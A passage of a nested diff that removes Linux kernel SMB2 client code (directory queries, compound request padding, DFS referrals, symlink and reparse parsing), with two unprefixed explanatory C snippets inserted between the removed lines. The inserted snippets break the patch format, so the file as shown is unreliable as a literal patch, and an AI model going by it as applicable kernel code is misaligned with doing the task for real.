+-		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto qdf_free;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-	/* Query directory */
+-	srch_inf->entries_in_buffer = 0;
+-	srch_inf->index_of_last_entry = 2;
+-
+-	memset(&qd_iov, 0, sizeof(qd_iov));
+-	rqst[1].rq_iov = qd_iov;
+-	rqst[1].rq_nvec = SMB2_QUERY_DIRECTORY_IOV_SIZE;
+-
+-	rc = SMB2_query_directory_init(xid, tcon, server,
+-				       &rqst[1],
+-				       COMPOUND_FID, COMPOUND_FID,
+-				       0, srch_inf->info_level);
+-	if (rc)
+-		goto qdf_free;
+-
+-	smb2_set_related(&rqst[1]);
+-
+-again:
+-	rc = compound_send_recv(xid, tcon->ses, server,
+-				flags, 2, rqst,
+-				resp_buftype, rsp_iov);
+-
+-	if (rc == -EAGAIN && retry_count++ < 10)
+-		goto again;
+-
+-	/* If the open failed there is nothing to do */
+-	op_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
+-	if (op_rsp == NULL || op_rsp->hdr.Status != STATUS_SUCCESS) {
+-		cifs_dbg(FYI, "query_dir_first: open failed rc=%d\n", rc);
+-		goto qdf_free;
+-	}
+-	fid->persistent_fid = op_rsp->PersistentFileId;
+-	fid->volatile_fid = op_rsp->VolatileFileId;
+-
+-	/* Anything other than ENODATA means a genuine error */
+-	if (rc && rc != -ENODATA) {
+-		SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+-		cifs_dbg(FYI, "query_dir_first: query directory failed rc=%d\n", rc);
+-		trace_smb3_query_dir_err(xid, fid->persistent_fid,
+-					 tcon->tid, tcon->ses->Suid, 0, 0, rc);
+-		goto qdf_free;
+-	}
+-
+-	atomic_inc(&tcon->num_remote_opens);
+-
+-	qd_rsp = (struct smb2_query_directory_rsp *)rsp_iov[1].iov_base;
+-	if (qd_rsp->hdr.Status == STATUS_NO_MORE_FILES) {
+-		trace_smb3_query_dir_done(xid, fid->persistent_fid,
+-					  tcon->tid, tcon->ses->Suid, 0, 0);
+-		srch_inf->endOfSearch = true;
+-		rc = 0;
+-		goto qdf_free;
+-	}
+-
+-	rc = smb2_parse_query_directory(tcon, &rsp_iov[1], resp_buftype[1],
+-					srch_inf);
+-	if (rc) {
+-		trace_smb3_query_dir_err(xid, fid->persistent_fid, tcon->tid,
+-			tcon->ses->Suid, 0, 0, rc);
+-		goto qdf_free;
+-	}
+-	resp_buftype[1] = CIFS_NO_BUFFER;
+-
+-	trace_smb3_query_dir_done(xid, fid->persistent_fid, tcon->tid,
+-			tcon->ses->Suid, 0, srch_inf->entries_in_buffer);
+-
+- qdf_free:
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_query_directory_free(&rqst[1]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	return rc;
+-}
+-
+-static int
+-smb2_query_dir_next(const unsigned int xid, struct cifs_tcon *tcon,
+-		    struct cifs_fid *fid, __u16 search_flags,
+-		    struct cifs_search_info *srch_inf)
+-{
+-	return SMB2_query_directory(xid, tcon, fid->persistent_fid,
+-				    fid->volatile_fid, 0, srch_inf);
+-}
+-
+-static int
+-smb2_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
+-	       struct cifs_fid *fid)
+-{
+-	return SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+-}
+-
+-/*
+- * If we negotiated the SMB2 protocol and got STATUS_PENDING, update
+- * the number of credits and return true; otherwise return false.
+- */
+-static bool
+-smb2_is_status_pending(char *buf, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	int scredits, in_flight;
+-
+-	if (shdr->Status != STATUS_PENDING)
+-		return false;
+-
+-	if (shdr->CreditRequest) {
+-		spin_lock(&server->req_lock);
+-		server->credits += le16_to_cpu(shdr->CreditRequest);
+-		scredits = server->credits;
+-		in_flight = server->in_flight;
+-		spin_unlock(&server->req_lock);
+-		wake_up(&server->request_q);
+-
+-		trace_smb3_pend_credits(server->CurrentMid,
+-				server->conn_id, server->hostname, scredits,
+-				le16_to_cpu(shdr->CreditRequest), in_flight);
+-		cifs_dbg(FYI, "%s: status pending add %u credits total=%d\n",
+-				__func__, le16_to_cpu(shdr->CreditRequest), scredits);
+-	}
+-
+-	return true;
+-}
+-
+-static bool
+-smb2_is_session_expired(char *buf)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-
+-	if (shdr->Status != STATUS_NETWORK_SESSION_EXPIRED &&
+-	    shdr->Status != STATUS_USER_SESSION_DELETED)
+-		return false;
+-
+-	trace_smb3_ses_expired(le32_to_cpu(shdr->Id.SyncId.TreeId),
+-			       le64_to_cpu(shdr->SessionId),
+-			       le16_to_cpu(shdr->Command),
+-			       le64_to_cpu(shdr->MessageId));
+-	cifs_dbg(FYI, "Session expired or deleted\n");
+-
+-	return true;
+-}
+-
+-static bool
+-smb2_is_status_io_timeout(char *buf)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-
+-	if (shdr->Status == STATUS_IO_TIMEOUT)
+-		return true;
+-	else
+-		return false;
+-}
+-
+-static void
+-smb2_is_network_name_deleted(char *buf, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-
+-	if (shdr->Status != STATUS_NETWORK_NAME_DELETED)
+-		return;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			if (tcon->tid == le32_to_cpu(shdr->Id.SyncId.TreeId)) {
+-				spin_lock(&tcon->tc_lock);
+-				tcon->need_reconnect = true;
+-				spin_unlock(&tcon->tc_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				pr_warn_once("Server share %s deleted.\n",
+-					     tcon->tree_name);
+-				return;
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-}
+-
+-static int
+-smb2_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
+-		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
+-{
+-	if (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_LEASING)
+-		return SMB2_lease_break(0, tcon, cinode->lease_key,
+-					smb2_get_lease_state(cinode));
+-
+-	return SMB2_oplock_break(0, tcon, persistent_fid, volatile_fid,
+-				 CIFS_CACHE_READ(cinode) ? 1 : 0);
+-}
+-
+-void
+-smb2_set_related(struct smb_rqst *rqst)
+-{
+-	struct smb2_hdr *shdr;
+-
+-	shdr = (struct smb2_hdr *)(rqst->rq_iov[0].iov_base);
+-	if (shdr == NULL) {
+-		cifs_dbg(FYI, "shdr NULL in smb2_set_related\n");
+-		return;
+-	}
+-	shdr->Flags |= SMB2_FLAGS_RELATED_OPERATIONS;
+-}
+-
+-char smb2_padding[7] = {0, 0, 0, 0, 0, 0, 0};
+-
+-void
+-smb2_set_next_command(struct cifs_tcon *tcon, struct smb_rqst *rqst)
+-{
+-	struct smb2_hdr *shdr;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = ses->server;
+-	unsigned long len = smb_rqst_len(server, rqst);
+-	int i, num_padding;
+-
+-	shdr = (struct smb2_hdr *)(rqst->rq_iov[0].iov_base);
+-	if (shdr == NULL) {
+-		cifs_dbg(FYI, "shdr NULL in smb2_set_next_command\n");
+-		return;
+-	}
+-
+-	/* SMB headers in a compound are 8-byte aligned. */
+-
+-	/* No padding needed */
+-	if (!(len & 7))
+-		goto finished;
+-
+-	num_padding = 8 - (len & 7);
+-	if (!smb3_encryption_required(tcon)) {
+-		/*
+-		 * If we do not have encryption then we can just add an extra
+-		 * iov for the padding.
+-		 */
+-		rqst->rq_iov[rqst->rq_nvec].iov_base = smb2_padding;
+-		rqst->rq_iov[rqst->rq_nvec].iov_len = num_padding;
+-		rqst->rq_nvec++;
+-		len += num_padding;
+-	} else {
+-		/*
+-		 * We cannot add a small padding iov for the encryption case
+-		 * because the encryption framework cannot handle the padding
+-		 * iovs.
+-		 * We have to flatten this into a single buffer and add
+-		 * the padding to it.
+-		 */
+-		for (i = 1; i < rqst->rq_nvec; i++) {
+-			memcpy(rqst->rq_iov[0].iov_base +
+-			       rqst->rq_iov[0].iov_len,
+-			       rqst->rq_iov[i].iov_base,
+-			       rqst->rq_iov[i].iov_len);
+-			rqst->rq_iov[0].iov_len += rqst->rq_iov[i].iov_len;
+-		}
+-		memset(rqst->rq_iov[0].iov_base + rqst->rq_iov[0].iov_len,
+-		       0, num_padding);
+-		rqst->rq_iov[0].iov_len += num_padding;
+-		len += num_padding;
+-		rqst->rq_nvec = 1;
+-	}
+-
+- finished:
+-	shdr->NextCommand = cpu_to_le32(len);
+-}
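
/*
 * The alignment logic above pads every request in a compound chain to
 * an 8-byte boundary so that NextCommand offsets stay aligned. The
 * arithmetic in isolation, as a small sketch (smb2_pad_to_8 is an
 * illustrative name):
 */
#include <stdint.h>

static inline uint32_t smb2_pad_to_8(uint32_t len)
{
	/* (len & 7) is len mod 8; pad only when it is nonzero */
	return (len & 7) ? len + (8 - (len & 7)) : len;
}
/* e.g. smb2_pad_to_8(73) == 80, smb2_pad_to_8(80) == 80 */
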
+-
+-/*
+- * Passes the query info response back to the caller on success.
+- * The caller needs to free this with free_rsp_buf().
+- */
+-int
+-smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+-			 const char *path, u32 desired_access,
+-			 u32 class, u32 type, u32 output_len,
+-			 struct kvec *rsp, int *buftype,
+-			 struct cifs_sb_info *cifs_sb)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	struct smb_rqst rqst[3];
+-	int resp_buftype[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qi_iov[1];
+-	struct kvec close_iov[1];
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	int rc;
+-	__le16 *utf16_path;
+-	struct cached_fid *cfid = NULL;
+-
+-	if (!path)
+-		path = "";
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	/*
+-	 * We can only call this for things we know are directories.
+-	 */
+-	if (!strcmp(path, ""))
+-		open_cached_dir(xid, tcon, path, cifs_sb, false,
+-				&cfid); /* cfid null if open dir failed */
+-
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = desired_access,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto qic_exit;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-	memset(&qi_iov, 0, sizeof(qi_iov));
+-	rqst[1].rq_iov = qi_iov;
+-	rqst[1].rq_nvec = 1;
+-
+-	if (cfid) {
+-		rc = SMB2_query_info_init(tcon, server,
+-					  &rqst[1],
+-					  cfid->fid.persistent_fid,
+-					  cfid->fid.volatile_fid,
+-					  class, type, 0,
+-					  output_len, 0,
+-					  NULL);
+-	} else {
+-		rc = SMB2_query_info_init(tcon, server,
+-					  &rqst[1],
+-					  COMPOUND_FID,
+-					  COMPOUND_FID,
+-					  class, type, 0,
+-					  output_len, 0,
+-					  NULL);
+-	}
+-	if (rc)
+-		goto qic_exit;
+-	if (!cfid) {
+-		smb2_set_next_command(tcon, &rqst[1]);
+-		smb2_set_related(&rqst[1]);
+-	}
+-
+-	memset(&close_iov, 0, sizeof(close_iov));
+-	rqst[2].rq_iov = close_iov;
+-	rqst[2].rq_nvec = 1;
+-
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto qic_exit;
+-	smb2_set_related(&rqst[2]);
+-
+-	if (cfid) {
+-		rc = compound_send_recv(xid, ses, server,
+-					flags, 1, &rqst[1],
+-					&resp_buftype[1], &rsp_iov[1]);
+-	} else {
+-		rc = compound_send_recv(xid, ses, server,
+-					flags, 3, rqst,
+-					resp_buftype, rsp_iov);
+-	}
+-	if (rc) {
+-		free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-		if (rc == -EREMCHG) {
+-			tcon->need_reconnect = true;
+-			pr_warn_once("server share %s deleted\n",
+-				     tcon->tree_name);
+-		}
+-		goto qic_exit;
+-	}
+-	*rsp = rsp_iov[1];
+-	*buftype = resp_buftype[1];
+-
+- qic_exit:
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_query_info_free(&rqst[1]);
+-	SMB2_close_free(&rqst[2]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	if (cfid)
+-		close_cached_dir(cfid);
+-	return rc;
+-}
+-
+-static int
+-smb2_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+-	     struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
+-{
+-	struct smb2_query_info_rsp *rsp;
+-	struct smb2_fs_full_size_info *info = NULL;
+-	struct kvec rsp_iov = {NULL, 0};
+-	int buftype = CIFS_NO_BUFFER;
+-	int rc;
+-
+-
+-	rc = smb2_query_info_compound(xid, tcon, "",
+-				      FILE_READ_ATTRIBUTES,
+-				      FS_FULL_SIZE_INFORMATION,
+-				      SMB2_O_INFO_FILESYSTEM,
+-				      sizeof(struct smb2_fs_full_size_info),
+-				      &rsp_iov, &buftype, cifs_sb);
+-	if (rc)
+-		goto qfs_exit;
+-
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-	buf->f_type = SMB2_SUPER_MAGIC;
+-	info = (struct smb2_fs_full_size_info *)(
+-		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength),
+-			       &rsp_iov,
+-			       sizeof(struct smb2_fs_full_size_info));
+-	if (!rc)
+-		smb2_copy_fs_info_to_kstatfs(info, buf);
+-
+-qfs_exit:
+-	free_rsp_buf(buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-static int
+-smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+-	       struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
+-{
+-	int rc;
+-	__le16 srch_path = 0; /* Null - open root of share */
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-
+-	if (!tcon->posix_extensions)
+-		return smb2_queryfs(xid, tcon, cifs_sb, buf);
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = "",
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+-		       NULL, NULL);
+-	if (rc)
+-		return rc;
+-
+-	rc = SMB311_posix_qfs_info(xid, tcon, fid.persistent_fid,
+-				   fid.volatile_fid, buf);
+-	buf->f_type = SMB2_SUPER_MAGIC;
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-	return rc;
+-}
+-
+-static bool
+-smb2_compare_fids(struct cifsFileInfo *ob1, struct cifsFileInfo *ob2)
+-{
+-	return ob1->fid.persistent_fid == ob2->fid.persistent_fid &&
+-	       ob1->fid.volatile_fid == ob2->fid.volatile_fid;
+-}
+-
+-static int
+-smb2_mand_lock(const unsigned int xid, struct cifsFileInfo *cfile, __u64 offset,
+-	       __u64 length, __u32 type, int lock, int unlock, bool wait)
+-{
+-	if (unlock && !lock)
+-		type = SMB2_LOCKFLAG_UNLOCK;
+-	return SMB2_lock(xid, tlink_tcon(cfile->tlink),
+-			 cfile->fid.persistent_fid, cfile->fid.volatile_fid,
+-			 current->tgid, length, offset, type, wait);
+-}
+-
+-static void
+-smb2_get_lease_key(struct inode *inode, struct cifs_fid *fid)
+-{
+-	memcpy(fid->lease_key, CIFS_I(inode)->lease_key, SMB2_LEASE_KEY_SIZE);
+-}
+-
+-static void
+-smb2_set_lease_key(struct inode *inode, struct cifs_fid *fid)
+-{
+-	memcpy(CIFS_I(inode)->lease_key, fid->lease_key, SMB2_LEASE_KEY_SIZE);
+-}
+-
+-static void
+-smb2_new_lease_key(struct cifs_fid *fid)
+-{
+-	generate_random_uuid(fid->lease_key);
+-}
+-
+-static int
+-smb2_get_dfs_refer(const unsigned int xid, struct cifs_ses *ses,
+-		   const char *search_name,
+-		   struct dfs_info3_param **target_nodes,
+-		   unsigned int *num_of_nodes,
+-		   const struct nls_table *nls_codepage, int remap)
+-{
+-	int rc;
+-	__le16 *utf16_path = NULL;
+-	int utf16_path_len = 0;
+-	struct cifs_tcon *tcon;
+-	struct fsctl_get_dfs_referral_req *dfs_req = NULL;
+-	struct get_dfs_referral_rsp *dfs_rsp = NULL;
+-	u32 dfs_req_size = 0, dfs_rsp_size = 0;
+-	int retry_count = 0;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, search_name);
+-
+-	/*
+-	 * Try to use the IPC tcon, otherwise just use any available tcon.
+-	 */
+-	tcon = ses->tcon_ipc;
+-	if (tcon == NULL) {
+-		spin_lock(&cifs_tcp_ses_lock);
+-		tcon = list_first_entry_or_null(&ses->tcon_list,
+-						struct cifs_tcon,
+-						tcon_list);
+-		if (tcon)
+-			tcon->tc_count++;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-	}
+-
+-	if (tcon == NULL) {
+-		cifs_dbg(VFS, "session %p has no tcon available for a dfs referral request\n",
+-			 ses);
+-		rc = -ENOTCONN;
+-		goto out;
+-	}
+-
+-	utf16_path = cifs_strndup_to_utf16(search_name, PATH_MAX,
+-					   &utf16_path_len,
+-					   nls_codepage, remap);
+-	if (!utf16_path) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	dfs_req_size = sizeof(*dfs_req) + utf16_path_len;
+-	dfs_req = kzalloc(dfs_req_size, GFP_KERNEL);
+-	if (!dfs_req) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	/* Highest DFS referral version understood */
+-	dfs_req->MaxReferralLevel = DFS_VERSION;
+-
+-	/* Path to resolve in a UTF-16 null-terminated string */
+-	memcpy(dfs_req->RequestFileName, utf16_path, utf16_path_len);
+-
+-	do {
+-		rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+-				FSCTL_DFS_GET_REFERRALS,
+-				(char *)dfs_req, dfs_req_size, CIFSMaxBufSize,
+-				(char **)&dfs_rsp, &dfs_rsp_size);
+-		if (!is_retryable_error(rc))
+-			break;
+-		usleep_range(512, 2048);
+-	} while (++retry_count < 5);
+-
+-	if (rc) {
+-		if (!is_retryable_error(rc) && rc != -ENOENT && rc != -EOPNOTSUPP)
+-			cifs_tcon_dbg(VFS, "%s: ioctl error: rc=%d\n", __func__, rc);
+-		goto out;
+-	}
+-
+-	rc = parse_dfs_referrals(dfs_rsp, dfs_rsp_size,
+-				 num_of_nodes, target_nodes,
+-				 nls_codepage, remap, search_name,
+-				 true /* is_unicode */);
+-	if (rc) {
+-		cifs_tcon_dbg(VFS, "parse error in %s rc=%d\n", __func__, rc);
+-		goto out;
+-	}
+-
+- out:
+-	if (tcon && !tcon->ipc) {
+-		/* ipc tcons are not refcounted */
+-		spin_lock(&cifs_tcp_ses_lock);
+-		tcon->tc_count--;
+-		/* tc_count can never go negative */
+-		WARN_ON(tcon->tc_count < 0);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-	}
+-	kfree(utf16_path);
+-	kfree(dfs_req);
+-	kfree(dfs_rsp);
+-	return rc;
+-}
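
/*
 * smb2_get_dfs_refer() above retries the referral ioctl a bounded
 * number of times with a short sleep between attempts (and only for
 * transient errors). The bare control flow in a self-contained form,
 * with try_once() and pause() as hypothetical stand-ins for the SMB2
 * ioctl and usleep_range():
 */
static int retry_bounded(int (*try_once)(void), void (*pause)(void),
			 int max_tries)
{
	int rc = -1;
	int i;

	for (i = 0; i < max_tries; i++) {
		rc = try_once();
		if (rc == 0)
			break;	/* success, stop retrying */
		pause();	/* brief backoff before the next attempt */
	}
	return rc;
}
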
+-
+-static int
+-parse_reparse_posix(struct reparse_posix_data *symlink_buf,
+-		      u32 plen, char **target_path,
+-		      struct cifs_sb_info *cifs_sb)
+-{
+-	unsigned int len;
+-
+-	/* See MS-FSCC 2.1.2.6 for the 'NFS' style reparse tags */
+-	len = le16_to_cpu(symlink_buf->ReparseDataLength);
+-
+-	if (le64_to_cpu(symlink_buf->InodeType) != NFS_SPECFILE_LNK) {
+-		cifs_dbg(VFS, "%lld not a supported symlink type\n",
+-			le64_to_cpu(symlink_buf->InodeType));
+-		return -EOPNOTSUPP;
+-	}
+-
+-	*target_path = cifs_strndup_from_utf16(
+-				symlink_buf->PathBuffer,
+-				len, true, cifs_sb->local_nls);
+-	if (!(*target_path))
+-		return -ENOMEM;
+-
+-	convert_delimiter(*target_path, '/');
+-	cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
+-
+-	return 0;
+-}
+-
+-static int
+-parse_reparse_symlink(struct reparse_symlink_data_buffer *symlink_buf,
+-		      u32 plen, char **target_path,
+-		      struct cifs_sb_info *cifs_sb)
+-{
+-	unsigned int sub_len;
+-	unsigned int sub_offset;
+-
+-	/* We handle Symbolic Link reparse tag here. See: MS-FSCC 2.1.2.4 */
+-
+-	sub_offset = le16_to_cpu(symlink_buf->SubstituteNameOffset);
+-	sub_len = le16_to_cpu(symlink_buf->SubstituteNameLength);
+-	if (sub_offset + 20 > plen ||
+-	    sub_offset + sub_len + 20 > plen) {
+-		cifs_dbg(VFS, "srv returned malformed symlink buffer\n");
+-		return -EIO;
+-	}
+-
+-	*target_path = cifs_strndup_from_utf16(
+-				symlink_buf->PathBuffer + sub_offset,
+-				sub_len, true, cifs_sb->local_nls);
+-	if (!(*target_path))
+-		return -ENOMEM;
+-
+-	convert_delimiter(*target_path, '/');
+-	cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
+-
+-	return 0;
+-}
+-
+-static int
+-parse_reparse_point(struct reparse_data_buffer *buf,
+-		    u32 plen, char **target_path,
+-		    struct cifs_sb_info *cifs_sb)
+-{
+-	if (plen < sizeof(struct reparse_data_buffer)) {
+-		cifs_dbg(VFS, "reparse buffer is too small. Must be at least 8 bytes but was %d\n",
+-			 plen);
+-		return -EIO;
+-	}
+-
+-	if (plen < le16_to_cpu(buf->ReparseDataLength) +
+-	    sizeof(struct reparse_data_buffer)) {
+-		cifs_dbg(VFS, "srv returned invalid reparse buf length: %d\n",
+-			 plen);
+-		return -EIO;
+-	}
+-
+-	/* See MS-FSCC 2.1.2 */
+-	switch (le32_to_cpu(buf->ReparseTag)) {
+-	case IO_REPARSE_TAG_NFS:
+-		return parse_reparse_posix(
+-			(struct reparse_posix_data *)buf,
+-			plen, target_path, cifs_sb);
+-	case IO_REPARSE_TAG_SYMLINK:
+-		return parse_reparse_symlink(
+-			(struct reparse_symlink_data_buffer *)buf,
+-			plen, target_path, cifs_sb);
+-	default:
+-		cifs_dbg(VFS, "srv returned unknown symlink buffer tag:0x%08x\n",
+-			 le32_to_cpu(buf->ReparseTag));
+-		return -EOPNOTSUPP;
+-	}
+-}
+-
+-static int
+-smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifs_sb_info *cifs_sb, const char *full_path,
+-		   char **target_path, bool is_reparse_point)
+-{
+-	int rc;
+-	__le16 *utf16_path = NULL;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	struct kvec err_iov = {NULL, 0};
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	struct smb_rqst rqst[3];
+-	int resp_buftype[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
+-	struct kvec close_iov[1];
+-	struct smb2_create_rsp *create_rsp;
+-	struct smb2_ioctl_rsp *ioctl_rsp;
+-	struct reparse_data_buffer *reparse_buf;
+-	int create_options = is_reparse_point ? OPEN_REPARSE_POINT : 0;
+-	u32 plen;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
+-
+-	*target_path = NULL;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	/* Open */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = full_path,
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto querty_exit;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-
+-	/* IOCTL */
+-	memset(&io_iov, 0, sizeof(io_iov));
+-	rqst[1].rq_iov = io_iov;
+-	rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
+-
+-	rc = SMB2_ioctl_init(tcon, server,
+-			     &rqst[1], fid.persistent_fid,
+-			     fid.volatile_fid, FSCTL_GET_REPARSE_POINT, NULL, 0,
+-			     CIFSMaxBufSize -
+-			     MAX_SMB2_CREATE_RESPONSE_SIZE -
+-			     MAX_SMB2_CLOSE_RESPONSE_SIZE);
+-	if (rc)
+-		goto querty_exit;
+-
+-	smb2_set_next_command(tcon, &rqst[1]);
+-	smb2_set_related(&rqst[1]);
+-
+-
+-	/* Close */
+-	memset(&close_iov, 0, sizeof(close_iov));
+-	rqst[2].rq_iov = close_iov;
+-	rqst[2].rq_nvec = 1;
+-
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto querty_exit;
+-
+-	smb2_set_related(&rqst[2]);
+-
+-	rc = compound_send_recv(xid, tcon->ses, server,
+-				flags, 3, rqst,
+-				resp_buftype, rsp_iov);
+-
+-	create_rsp = rsp_iov[0].iov_base;
+-	if (create_rsp && create_rsp->hdr.Status)
+-		err_iov = rsp_iov[0];
+-	ioctl_rsp = rsp_iov[1].iov_base;
+-
+-	/*
+-	 * Open was successful and we got an ioctl response.
+-	 */
+-	if ((rc == 0) && (is_reparse_point)) {
+-		/* See MS-FSCC 2.3.23 */
+-
+-		reparse_buf = (struct reparse_data_buffer *)
+-			((char *)ioctl_rsp +
+-			 le32_to_cpu(ioctl_rsp->OutputOffset));
+-		plen = le32_to_cpu(ioctl_rsp->OutputCount);
+-
+-		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
+-		    rsp_iov[1].iov_len) {
+-			cifs_tcon_dbg(VFS, "srv returned invalid ioctl len: %d\n",
+-				 plen);
+-			rc = -EIO;
+-			goto querty_exit;
+-		}
+-
+-		rc = parse_reparse_point(reparse_buf, plen, target_path,
+-					 cifs_sb);
+-		goto querty_exit;
+-	}
+-
+-	if (!rc || !err_iov.iov_base) {
+-		rc = -ENOENT;
+-		goto querty_exit;
+-	}
+-
+-	rc = smb2_parse_symlink_response(cifs_sb, &err_iov, target_path);
+-
+- querty_exit:
+-	cifs_dbg(FYI, "query symlink rc %d\n", rc);
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_ioctl_free(&rqst[1]);
+-	SMB2_close_free(&rqst[2]);
